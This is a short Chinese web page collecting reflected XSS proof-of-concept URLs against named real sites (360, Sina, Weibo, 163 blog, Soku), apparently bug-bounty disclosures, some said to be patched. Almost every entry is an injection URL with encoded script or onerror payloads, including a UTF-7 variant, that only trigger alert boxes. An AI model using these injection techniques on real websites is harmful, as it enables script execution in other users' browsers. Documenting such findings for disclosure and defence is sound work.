xss小集合 - 网站安全 - 自学php

360 xss 

漏洞 网站： http://dev.app.360.cn

漏洞重现： http://dev.app.360.cn/seriesnum/api?appkey=02a051317dd721459824ecc8e6e77abf&status=1&product_id=Grsm_02&is_real=0&callback=%3Cscript%3Ealert%281%29%3C/script%3E

漏洞证明：

 

漏洞网站： http://wangzhan.360.cn

漏洞重现： http://wangzhan.360.cn/index.php/abc/abc/abc/%22%3E%3Cscript%3Ealert%28%2fqingsh4n%2f%29%3C%2fscript%3E%2f%2f

漏洞证明：

ps:上面两个已经补了，并且蹭了两个u盘

 

Sina xss

漏洞网站： http://common.fj.sina.com.cn/

漏洞重现：

http://common.fj.sina.com.cn/index.php/201209room/interfaces/vote_entry?callback=%2B%2Fv8%20%2BADwAaAB0AG0APgA8AGIAbwBkAHkAPgA8AHMAYwByAGkAcAB0AD4AYQBsAGUAcgB0ACgAMQApADsAPAAvAHMAYwByAGkAcAB0AD4APAAvAGIAbwBkAHkAPgA8AC8AaAB0AG0APg

漏洞证明：

漏洞网站： http://qing.weibo.com/

漏洞重现： http://qing.weibo.com/2389286414/8e699e0e34002bsw. html

漏洞证明：

 

163 xss

漏洞网站： http://blog.163.com

漏洞重现：

http://blog.163.com/s/musicWrap.s?n=%B1q%C0Y%A6A%A8%D3&a=%BCB%C5w&t=lrc&event=qingshen<img/src=1%20onerror=alert(1)>&_jsonType=2

  漏洞证明：

 

Soku xss

漏洞网站： http://www.soku.com/

漏洞重现：

http://www.soku.com/t/nisearch/%22%3E%3Cimg%20src=1%20onerror=alert(1)%3E///

漏洞证明：

查看更多关于xss小集合 - 网站安全 - 自学php的详细内容...